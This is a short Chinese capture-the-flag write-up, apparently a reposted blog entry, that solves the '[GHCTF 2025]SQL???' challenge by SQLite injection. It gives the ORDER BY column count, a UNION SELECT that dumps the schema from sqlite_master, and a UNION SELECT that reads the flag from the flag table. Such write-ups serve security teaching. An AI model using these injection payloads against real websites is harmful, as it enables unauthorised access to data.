当前位置: 首页 > news >正文

[GHCTF 2025]SQL???

news 来源:原创 2025/6/2 17:58:28

打开题目在线环境:

在这里插入图片描述

先尝试注入:

id=1;show databases;

在这里插入图片描述
发现报错,后来看了wp才知道这个题目是SQLite注入。
我看的是这个师傅的wp:

https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=b2e94c28c4b9713fffb8456c983de1b3&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-146164505-null-null.142v102pc_search_result_base9&utm_term=%5BGHCTF%202025%5DSQL&spm=1018.2226.3001.4187

1.先判断有几列

? id=1 order by 6 #

到第六列时:
在这里插入图片描述
2.爆出来表名

/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

在这里插入图片描述
所以我们要找的就是flag表里的flag列
直接payload:

/?id=1 union select 1,2,3,4,flag from flag

在这里插入图片描述

相关文章:

  • leetcode hot100刷题日记——32.杨辉三角
  • CppCon 2014 学习: The Implementation of Value Types
  • 深入理解 Java 中的 Unsafe 类:原理、应用与风险
  • Java并发编程实战 Day 1:Java并发编程基础与线程模型
  • [SLAM自救笔记0]:开端
  • 字符串索引、幻读的解决方法
  • 玩客云WS1608控制LED灯的颜色
  • RLHF奖励模型的训练
  • 【Qt】EventFilter,要增加事件拦截器才能拦截到事件
  • 数据库只更新特定字段的两种方式(先读后写 vs. 动态组织 SQL)-golang SQLx 实现代码(动态组织 SQL)
  • 【设计模式-4.6】行为型——状态模式
  • 电路学习(二)之电容
  • Win10 doccano pip安装笔记
  • 【深度学习】16. Deep Generative Models:生成对抗网络(GAN)
  • STM32CubeMX串口配置
  • LeetCode[257]二叉树的所有路径
  • 【图像处理入门】3. 几何变换基础:从平移旋转到插值魔法
  • 基于开源AI大模型AI智能名片S2B2C商城小程序源码的销售环节数字化实现路径研究
  • 接口性能优化
  • MySql(九)
  • 网站开发网站设计制作/seo霸屏软件
  • 做网站是com好还是cn好/广告公司推广
  • 企业网站建设御彩云/推广一单500
  • 家用电脑可以做网站服务器/最近有哪些新闻
  • 网站建设域名申请/什么是关键词
  • 新浪博客怎么给自己网站做链接吗/制作网站教程